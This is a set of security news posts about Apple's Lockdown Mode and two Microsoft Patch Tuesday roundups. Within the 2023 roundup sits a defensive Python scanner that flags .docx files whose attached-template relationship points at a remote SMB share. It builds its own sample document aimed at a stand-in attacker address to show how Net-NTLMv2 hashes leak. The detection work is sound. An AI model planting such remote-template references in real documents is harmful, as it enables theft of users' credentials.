Apple has introduced a powerful new data security feature, Lockdown Mode, for iPhone users running iOS 16 and later versions. This feature aims to provide heightened protection against cyber threats, particularly for individuals who are at a higher risk of being targeted by advanced attacks. While Lockdown Mode offers enhanced security, it does come with certain limitations that users should be aware of before enabling it.

What is Lockdown Mode?

Lockdown Mode is an optional, deliberately extreme protection designed for the small number of users who may be personally targeted by sophisticated, often state-backed, spyware, such as journalists, activists, politicians or other high-profile targets. It is intended to protect those users from mercenary spyware and similar malicious activity. Although designed for that narrow group, the feature is available to every user on a device running iOS 16 or later; it is off by default and has to be switched on deliberately.

The feature trades functionality for a smaller attack surface. When enabled, Lockdown Mode blocks most message attachment types, restricts web browsing, and disables a number of features that spyware such as Pegasus has historically abused to gain a foothold on a device without the user doing anything.

How to Enable Lockdown Mode?

Activating Lockdown Mode is straightforward. Open the Settings app, select Privacy & Security, scroll down to Lockdown Mode, tap Turn On Lockdown Mode and confirm. The iPhone must restart for the change to take effect; once it is back up, the restrictions apply automatically with no further configuration. Lockdown Mode is a per-device setting, so an iPad or Mac used alongside the iPhone has to be switched on separately.

What Does Lockdown Mode Disable?

While Lockdown Mode boosts security, it does so by limiting the functionality of certain apps and services. Here are some of the most notable effects of enabling Lockdown Mode:

Messages: In Apple's Messages app, most attachment types are blocked, apart from certain image, video and audio formats. Links and link previews are unavailable, so a shared URL is shown only as raw text rather than a rendered preview. Third-party messengers such as WhatsApp are not covered by these rules, although any web content they display through the system WebKit view inherits the browsing restrictions described below.

FaceTime: Incoming FaceTime calls are blocked unless the user has previously called that person. The same rule applies to incoming invitations and service requests for other Apple services when they come from someone the user has not contacted before.

Web Browsing: Safari, and any app that renders web content with Apple's WebKit engine, blocks certain complex web technologies; the most notable is just-in-time (JIT) JavaScript compilation, a frequent target of browser exploits. Web fonts may not be displayed and some images may be replaced by a missing-image icon, so pages can load more slowly, look incomplete or fail to work. A side effect worth knowing about: because these behaviours are observable from a web page, a site can often tell that a visitor is in Lockdown Mode, which makes such users somewhat easier to fingerprint. Trusted sites can be excluded individually from the Lockdown Mode settings.

App and Website Functionality: In general, apps and websites that depend on the blocked technologies will lose some functionality. Restricting JIT and other complex features removes much of the surface that drive-by and zero-click exploits rely on, which is the point of the mode: an exploit chain that needs those features has nowhere to start.

Configuration and Wired Connections: Configuration profiles cannot be installed and the device cannot be enrolled in mobile device management while Lockdown Mode is on. Wired connections to a computer or accessory are blocked while the iPhone is locked, which frustrates tools that try to extract data over the device's data port.

Emergency Features Remain Unaffected

One of the significant benefits of Lockdown Mode is that it does not interfere with the basics. Phone calls and plain text messages continue to work, emergency features such as Emergency SOS are unaffected, and Find My iPhone continues to operate normally. These functions are vital for user safety and for situations where the user needs to reach emergency help or locate the device.

Limitations on Location Sharing

Another side effect concerns location data attached to photos. While Find My iPhone remains unaffected, Lockdown Mode strips location metadata from photos when they are shared, removes Shared Albums from the Photos app and blocks invitations to join shared albums. The intent is the same as elsewhere: deny an attacker an easy channel for learning where the user has been.

Conclusion

In summary, Lockdown Mode is a valuable feature for iPhone users who are concerned about advanced cyber threats and spyware attacks. Although it may limit the functionality of some apps and services—such as messaging apps, FaceTime, and web browsing—the trade-off is the added security it provides against highly sophisticated malware. While it may not be suitable for everyday users due to the limitations it imposes, for those who need heightened protection, Lockdown Mode is an important tool to safeguard their personal data and privacy.

The post Here’s the little known iPhone data security secret, the Lockdown Mode appeared first on Cybersecurity Insiders.

Microsoft today issued software updates to fix at least five dozen security holes in Windows and supported software, including patches for two zero-day vulnerabilities that are already being exploited. Also, Adobe, Google Chrome and Apple iOS users may have their own zero-day patching to do.

On Sept. 7, researchers at Citizen Lab warned they were seeing active exploitation of a “zero-click,” zero-day flaw to install spyware on iOS devices without any interaction from the victim.

“The exploit chain was capable of compromising iPhones running the latest version of iOS (16.6) without any interaction from the victim,” the researchers wrote.

According to Citizen Lab, the exploit uses malicious images sent via iMessage, an embedded component of Apple’s iOS that has been the source of previous zero-click flaws in iPhones and iPads.

Apple says the iOS flaw (CVE-2023-41064) does not seem to work against devices that have its ultra-paranoid “Lockdown Mode” enabled. This feature restricts non-essential iOS features to reduce the device’s overall attack surface, and it was designed for users concerned that they may be subject to targeted attacks. Citizen Lab says the bug it discovered was being exploited to install spyware made by the Israeli cyber surveillance company NSO Group.

This vulnerability is fixed in iOS 16.6.1 and iPadOS 16.6.1. To turn on Lockdown Mode in iOS 16, go to Settings, then Privacy and Security, then Lockdown Mode.

Not to be left out of the zero-day fun, Google acknowledged on Sept. 11 that a heap overflow bug in Chrome is being exploited in the wild. Google says it is releasing updates to fix the flaw, and that restarting Chrome is the way to apply any pending updates. Interestingly, Google says this bug was reported by Apple and Citizen Lab.

On the Microsoft front, a zero-day in Microsoft Word is among the more concerning bugs fixed today. Tracked as CVE-2023-36761, it is flagged as an “information disclosure” vulnerability. But that description hardly grasps at the sensitivity of the information potentially exposed here.

Tom Bowyer, manager of product security at Automox, said exploiting this vulnerability could lead to the disclosure of Net-NTLMv2 hashes, which are used for authentication in Windows environments.

“If a malicious actor gains access to these hashes, they can potentially impersonate the user, gaining unauthorized access to sensitive data and systems,” Bowyer said, noting that CVE-2023-36761 can be exploited just by viewing a malicious document in the Windows preview pane. “They could also conduct pass-the-hash attacks, where the attacker uses the hashed version of a password to authenticate themselves without needing to decrypt it.”
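Bowyer's description above points at the generic way Office documents leak Net-NTLMv2 responses: a part of the document references a resource on an attacker-controlled share, and Windows authenticates to that share when the document is opened or previewed. The page does not say which part CVE-2023-36761 abuses, so the following added example (not the article's code, and not a detector for that specific bug) is the triage check I would run on inbound .docx files at a mail gateway: it unpacks the Open Packaging Conventions zip and lists every relationship whose target is a UNC or file: path. The sample documents, the 198.51.100.7 address (an RFC 5737 documentation address) and the intranet hostname are constructed for the example.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# OPC package-relationships namespace used by every *.rels part in a .docx
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)

# Target forms that make Windows resolve a remote share (SMB, with WebDAV as the
# fallback) and therefore offer the user's Net-NTLMv2 response to whoever answers.
UNC_TARGET = re.compile(r"^(\\\\|//|file:|\\\\\?\\UNC\\)", re.IGNORECASE)


def external_relationships(docx_bytes: bytes):
    """Yield (part, rel_id, rel_type, target) for every relationship marked External."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode") == "External":
                    yield name, rel.get("Id"), rel.get("Type", ""), rel.get("Target", "")


def remote_share_targets(docx_bytes: bytes):
    """Return the External relationships whose target is a UNC or file: path."""
    return [rel for rel in external_relationships(docx_bytes) if UNC_TARGET.match(rel[3])]


def build_sample_docx(template_target: str) -> bytes:
    """Constructed sample: a minimal .docx whose settings part points at an attached
    template. Real documents carry many more parts; only the .rels file matters here."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
        f'Target="{template_target}" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        # Placeholder parts so the package looks like a document; they are not parsed.
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("word/document.xml", "<w:document/>")
        pkg.writestr("word/settings.xml", "<w:settings/>")
        pkg.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # 198.51.100.7 stands in for an attacker-controlled host (constructed sample).
    bad = build_sample_docx(r"\\198.51.100.7\share\normal.dotx")
    good = build_sample_docx("https://intranet.example/templates/normal.dotx")
    for label, doc in (("attacker-template.docx", bad), ("intranet-template.docx", good)):
        hits = remote_share_targets(doc)
        print(label, "FLAGGED" if hits else "clean", hits)
```

Pair the scan with network-level mitigation: blocking outbound TCP 445 at the perimeter and enabling the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policy keeps the credential from leaving even when a document slips through. Plain http:// and https:// External targets are deliberately left alone, because hyperlinks are ubiquitous; if WebDAV egress is a concern in your environment, extend UNC_TARGET accordingly.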

The other Windows zero-day fixed this month is CVE-2023-36802. This is an “elevation of privilege” flaw in the “Microsoft Streaming Service Proxy,” which is built into Windows 10, 11 and Windows Server versions. Microsoft says an attacker who successfully exploits the bug can gain SYSTEM level privileges on a Windows computer.

Five of the flaws Microsoft fixed this month earned its “critical” rating, which the software giant reserves for vulnerabilities that can be exploited by malware or malcontents with little or no interaction by Windows users.

According to the SANS Internet Storm Center, the most serious critical bug in September’s Patch Tuesday is CVE-2023-38148, a weakness in the Internet Connection Sharing service on Windows. Microsoft says an unauthenticated attacker could leverage the flaw to install malware just by sending a specially crafted data packet to a vulnerable Windows system. The service is typically not running unless connection sharing or Mobile Hotspot has been turned on, so the hosts that matter most are those where it is.

Finally, Adobe has released critical security updates for its Adobe Reader and Acrobat software that also fixes a zero-day vulnerability (CVE-2023-26369). More details are at Adobe’s advisory.

For a more granular breakdown of the Windows updates pushed out today, check out Microsoft Patch Tuesday by Morphus Labs. In the meantime, consider backing up your data before updating Windows, and keep an eye on AskWoody.com for reports of any widespread problems with any of the updates released as part of September’s Patch Tuesday.

This month’s Patch Tuesday offers a little something for everyone, including security updates for a zero-day flaw in Microsoft Windows that is under active attack, and another Windows weakness experts say could be used to power a fast-spreading computer worm. Also, Apple has quashed a pair of zero-day bugs affecting certain macOS and iOS users, and released iOS 16, which offers a new privacy and security feature called “Lockdown Mode.” And Adobe axed 63 vulnerabilities in a range of products.

Microsoft today released software patches to plug at least 64 security holes in Windows and related products. Worst in terms of outright scariness is CVE-2022-37969, which is a “privilege escalation” weakness in the Windows Common Log File System Driver that allows attackers to gain SYSTEM-level privileges on a vulnerable host. Microsoft says this flaw is already being exploited in the wild.

Kevin Breen, director of cyber threat research at Immersive Labs, said any vulnerability that is actively targeted by attackers in the wild must be put to the top of any patching list.

“Not to be fooled by its relatively low CVSS score of 7.8, privilege escalation vulnerabilities are often highly sought after by cyber attackers,” Breen said. “Once an attacker has managed to gain a foothold on a victim’s system, one of their first actions will be to gain a higher level of permissions, allowing the attacker to disable security applications and any device monitoring. There is no known workaround to date, so patching is the only effective mitigation.”

Satnam Narang at Tenable said CVE-2022-24521 — a similar vulnerability in the same Windows log file component — was patched earlier this year as part of Microsoft’s April Patch Tuesday release and was also exploited in the wild.

“CVE-2022-37969 was disclosed by several groups, though it’s unclear if CVE-2022-37969 is a patch-bypass for CVE-2022-24521 at this point,” Narang said.

Another vulnerability Microsoft patched this month — CVE-2022-35803 — also seems to be related to the same Windows log file component. While there are no indications CVE-2022-35803 is being actively exploited, Microsoft suggests that exploitation of this flaw is more likely than not.

Trend Micro’s Dustin Childs called attention to CVE-2022-34718, a remote code execution flaw in the Windows TCP/IP service that could allow an unauthenticated attacker to execute code with elevated privileges on affected systems without user interaction.

“That officially puts it into the ‘wormable’ category and earns it a CVSS rating of 9.8,” Childs said. “However, only systems with IPv6 enabled and IPSec configured are vulnerable. While good news for some, if you’re using IPv6 (as many are), you’re probably running IPSec as well. Definitely test and deploy this update quickly.”

Cisco Talos warns about four critical vulnerabilities fixed this month. Two of them, CVE-2022-34721 and CVE-2022-34722, have severity scores of 9.8, though they are “less likely” to be exploited, according to Microsoft.

“These are remote code execution vulnerabilities in the Windows Internet Key Exchange protocol that could be triggered if an attacker sends a specially crafted IP packet,” wrote Jon Munshaw and Asheer Malhotra. “Two other critical vulnerabilities, CVE-2022-35805 and CVE-2022-34700 exist in on-premises instances of Microsoft Dynamics 365. An authenticated attacker could exploit these vulnerabilities to run a specially crafted trusted solution package and execute arbitrary SQL commands. The attacker could escalate their privileges further and execute commands as the database owner.”

Not to be outdone, Apple fixed at least two zero-day vulnerabilities when it released updates for iOS, iPadOS, macOS and Safari. CVE-2022-32984 is a problem in the deepest recesses of the operating system (the kernel). Apple pushed an emergency update for a related zero-day last month in CVE-2022-32983, which could be used to foist malware on iPhones, iPads and Macs that visited a booby-trapped website.

Also listed under active attack is CVE-2022-32817, which has been fixed in macOS 12.6 (Monterey), macOS 11.7 (Big Sur), iOS 15.7 and iPadOS 15.7, and iOS 16. The same vulnerability was fixed in watchOS in July 2022, and Apple credits Xinru Chi of cybersecurity firm Pangu Lab with reporting it.

“Interestingly, this CVE is also listed in the advisory for iOS 16, but it is not called out as being under active exploit for that flavor of the OS,” Trend Micro’s Childs noted. “Apple does state in its iOS 16 advisory that ‘Additional CVE entries to be added soon.’ It’s possible other bugs could also impact this version of the OS. Either way, it’s time to update your Apple devices.”

Apple’s iOS 16 includes two new security and privacy features — Lockdown Mode and Safety Check. Wired.com describes Safety Check as a feature for users who are at risk for, or currently experiencing, domestic abuse.

“The tool centralizes a number of controls in one place to make it easier for users to manage and revoke access to their location data and reset privacy-related permissions,” wrote Lily Hay Newman.

“Lockdown Mode, on the other hand, is meant for users who potentially face targeted spyware attacks and aggressive state-backed hacking. The feature comprehensively restricts any nonessential iOS features so there are as few potential points of entry to a device as possible. As more governments and repressive entities around the world have begun purchasing powerful commodity spyware to target individuals of particular importance or interest, iOS’s general security defenses haven’t been able to keep pace with these specialized threats.”

To turn on Lockdown Mode in iOS 16, go to Settings, then Privacy and Security, then Lockdown Mode. Safety Check is located in the same area.

Finally, Adobe released seven patches addressing 63 security holes in Adobe Experience Manager, Bridge, InDesign, Photoshop, InCopy, Animate, and Illustrator. More on those updates is here.

Don’t forget to back up your data and/or system before applying any security updates. If you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there’s a decent chance other readers have experienced the same and may chime in here with useful tips.

Apple has announced a ‘Lockdown Mode’ in its upcoming iOS 16, iPadOS 16 and macOS Ventura software. The feature is meant to protect users against mercenary spyware like Pegasus and other malicious software.

Aimed at journalists, activists and politicians, the optional feature (it is off by default and must be turned on deliberately) is meant to help users defend themselves against targeted cyber attacks.

Israel-based NSO Group developed the spyware dubbed Pegasus a few years ago, saying the software was built to help governments and law enforcement agencies conduct surveillance of targets deemed a threat to national security.

However, the tool has allegedly been misused against public figures: a Saudi prince is accused of having the surveillance software deployed against dignitaries such as Amazon founder Jeff Bezos.

To counter such spyware in the future, Apple has introduced a feature called ‘Lockdown Mode’ that blocks most message attachment types, disables links and link previews in Messages, and blocks incoming invitations and FaceTime calls from people the user has not previously contacted.

Showing its commitment to security, Apple also announced Rapid Security Response, which delivers important security fixes between regular OS updates so that known exploits can be patched sooner. The feature is part of iOS 16, iPadOS 16 and macOS Ventura, and it is designed so that fixes can be applied quickly, in some cases without a full restart.

Note 1- In 2021, Apple, the American technology giant behind the iPhone, filed a lawsuit against Israel’s NSO Group in federal court in California. The suit seeks a permanent injunction barring NSO from using any Apple software, services or devices, as well as damages for the harm done so far.

Note 2- Earlier this year, Google’s Threat Analysis Group reported a new spyware tool targeting the Android ecosystem. Named Hermit and developed by Italy’s RCS Lab in 2021, it is aimed at the phones of selected individuals and transmits intelligence from them to remote servers. The data sent to its command-and-control servers includes contacts, photos, videos, messages and e-wallet data.

Note 3- Apple is also offering up to $2 million, the top award in its bug bounty programme, to researchers who find qualifying bypasses of Lockdown Mode. It also announced a $10 million grant, to be topped up with any damages awarded in the NSO lawsuit, to support organisations that investigate, expose and prevent highly targeted cyber attacks.

 

The post Apple launches Lockdown Mode to protect its users against spyware appeared first on Cybersecurity Insiders.